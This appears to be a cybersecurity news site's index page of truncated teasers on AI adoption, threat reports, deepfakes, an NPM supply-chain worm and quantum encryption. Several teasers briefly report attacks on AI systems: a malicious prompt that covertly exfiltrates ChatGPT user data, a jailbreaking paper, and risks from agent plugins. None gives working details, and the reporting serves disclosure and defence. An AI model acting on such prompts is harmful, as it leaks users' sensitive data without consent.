In the cybersecurity world, we often assume that small and medium-sized businesses (SMBs) are the lagging indicators of digital maturity. But new research from Tech.co and Expert Market suggests that SMB leaders are becoming surprisingly surgical in their tech adoption. The data reveal a major pivot in 2026: while many organizations are pulling back AI for general business tasks, automated cybersecurity remains a non-negotiable priority. As inflation pressures and tech regret drive a more sel
ai (149)
With attackers able to move at AI speed, defenders cannot rely on the techniques and instincts they have come to trust. "That means putting in place stronger identity controls," said Jack Butler, a senior enterprise solutions engineer at Sumo Logic, a SecOps vendor. "That means putting in place the more robust logging program and correlation engines to detect all of these in real time and reassess signals of trust. It needs to be reassessed dynamically."[1]
As for what to do about the substan
SonicWall has launched its 2026 Cyber Protect Report, marking a significant shift in how the organization presents threat intelligence. Rather than focusing solely on raw data, the report prioritizes protection outcomes for business leaders. The findings indicate that while the volume of attacks remains high, adversaries are becoming more precise, with medium and high-severity incidents rising by over 20% to reach 13 billion hits.
One of the most significant findings in the 2026 report is the
The idea that artificial intelligence might one day rival human creativity has become a familiar theme in public conversation. Generative models can rapidly produce images, stories and designs, which makes it tempting to assume that they possess something like imagination. A new study published in Advanced Science challenges that assumption in a direct and illuminating way. By examining how humans and AI generate images from abstract prompts, the researchers show that what looks like creativity
Senior business leaders in the UK are experiencing a significant rise in job complexity, with artificial intelligence (AI) identified as a primary driver. A study by Alliance Manchester Business School (AMBS), based on a Censuswide survey of 500 UK managers, directors, and C-suite executives, reveals that almost three quarters (73%) of senior management have found their roles more complex since 2020 because of AI. This figure climbs to 79% among directors and C-suite personnel, and 82% among m
Users frequently entrust AI assistants with highly sensitive information, including medical records, financial documents, and proprietary business code. Check Point researchers have disclosed a critical vulnerability in ChatGPT's architecture that enables attackers to extract user data covertly. A flaw in ChatGPT's code execution environment demonstrated how a single malicious prompt could quietly exfiltrate sensitive user data without warning or user approval.[1]
The Vulnerability - OpenAI de
If there's one thing that AI is good at, particularly language models, it's detecting patterns in datasets so large that it would be practically impossible for humans to sift through them all, quickly and accurately. That certainly seems to be the case with Anthropic's new general-purpose model, Claude Mythos, as the company has announced that it used it to detect "thousands of high-severity vulnerabilities, including some in every major operating system and web browser."
Alongside the launch o
On 28 February 2026, a joint US-Israeli military campaign struck Iranian nuclear facilities, military infrastructure, and leadership targets in what was officially called Operation Epic Fury. Social media quickly flooded with false footage of the conflict, including massive explosions in Tel Aviv, successful Iranian missile strikes on US warships, and satellite imagery purporting to show damage to American military bases in the Gulf.
Some of this footage was recycled from unrelated conflicts,
If you've been using OpenClaw, the wildly popular AI agentic tool that took the developer community by storm, you should probably update it if you haven't done so already. OpenClaw, as was reported in the past, has widely known security problems. From the beginning, OpenClaw creator Peter Steinberger has warned potential users on GitHub that "There is no 'perfectly secure' setup." Users can grant OpenClaw control over their devices and access to specific apps, local files, and logged-in accou
Rebranded as TrendAI, Trend Micro has published findings from a global study of 3,700 business and IT decision makers showing that 67% felt pressured to approve artificial intelligence projects despite security concerns. One in seven described those concerns as extreme, yet overrode them to match competitors and meet internal demands.
Chief Platform and Business Officer and Head of TrendAI, Rachel Jin, commented: “Organizations are not lacking awareness of risk; they’re lacking the conditions t
Every time you check your bank balance online, send an email, or make a purchase with a credit card, your information is encrypted, a mathematical shield that keeps your data protected from prying eyes. This encryption has worked extremely well for decades. The algorithms safeguarding your most sensitive data would take today’s most powerful traditional computers millions of years to crack. However, a new type of machine is emerging that could change everything. That machine is the quantum c
Security researchers have uncovered a new supply chain attack targeting the NPM registry with malicious code that exhibits worm-like propagation capabilities. Named Sandworm_Mode, the attack was deployed through 19 packages published under two aliases, which relied on typo squatting to trick developers into executing the malicious code. According to cybersecurity firm Socket, the attack bears the hallmarks of the Shai-Hulud campaign that hit roughly 800 NPM packages in September and November 2
Artificial intelligence is becoming woven into the fabric of daily life, from helping doctors summarize medical notes to assisting developers with complex code. As these systems move from novelty to infrastructure, the central question is no longer what they can do, but what happens when they are pushed to do what they should not. A recent research paper titled Jailbreaking the Matrix: Nullspace Steering for Controlled Model Subversion and a companion article from TechXplore explore this quest
Drones have emerged as a significant security concern for US military bases and critical infrastructure. These unmanned systems are typically low-cost, simple to operate, and difficult to detect using traditional air-defense sensors. A single drone can be deployed for surveillance, smuggling, or disruption, creating a scenario where security forces must respond swiftly without overreacting. To address this challenge, the US Army is adopting a new counter-drone platform known as DroneArmor. D
In the 1980’s the rock group The Who, had a hit song: ‘Who are You.” That was rock’n’roll, but what is happening now is a question of, “Is it Real, or is it Fake?” Who are You? In modern digital enterprises, the fastest-growing identity population is no longer human users; it is machine identity. APIs, microservices, containers, cloud workloads, CI/CD pipelines, robotic process automation, and AI agents all authenticate using identities. Each relies on credentials such as keys, certificates
The past few years have brought an extraordinary shift in how digital content is created. Videos and images that once required studios, actors, and expensive equipment can now be produced by generative deep learning models that run on a laptop. These systems can fabricate a person’s face, voice, and gestures with such precision that the results often look indistinguishable from real footage. This technological leap has opened remarkable creative possibilities, yet it has also created a new kind
Quorum Cyber has published its 2026 Global Cyber Risk Outlook report[1], detailing a significant evolution in cyber threats driven by Artificial Intelligence (AI) and Ransomware-as-a-Service (RaaS) platforms. The analysis, based on incidents across more than 350 organizations worldwide in 2025, indicates that cybercrime has entered a more industrialized phase. This development allows even poorly skilled attackers to launch sophisticated operations, with nation-state actors automating up to 90%
Sentinel Labs has provided a keen look into LLMs and SOC operations. For security teams, AI promised to write secure code, identify and patch vulnerabilities, and replace monotonous security operations tasks. Its key value proposition was raising costs for adversaries while lowering them for defenders.
To evaluate whether Large Language Models (LLMs) were both sufficiently performant and reliable to be deployed in the enterprise, a wave of new benchmarks was created. In 2023, these early benc
AI coding assistants are no longer just autocompleting lines of code, they are quietly making decisions for you. Tools like Claude Code are able to read projects, plan multi-step changes, install dependencies, and modify files with minimal human oversight. To make this possible, these assistants rely on plugin marketplaces, where third-party developers can enable ‘skills’ that teach the agent how to manage infrastructure, testing, and dependencies. Though powerful, the model requires a high d
As the digital landscape continues to evolve, so too do the threats that organizations must contend with. In this year's final Reporter's Notebook conversation, cybersecurity experts Rob Wright from Dark Reading, David Jones from Cybersecurity Dive, and Alissa Irei from Tech Target Search Security share their insights on what the future holds for cybersecurity in 2026. Drawing from AI-summarized industry reports and expert opinions, the conversation highlights key trends, challenges, and oppor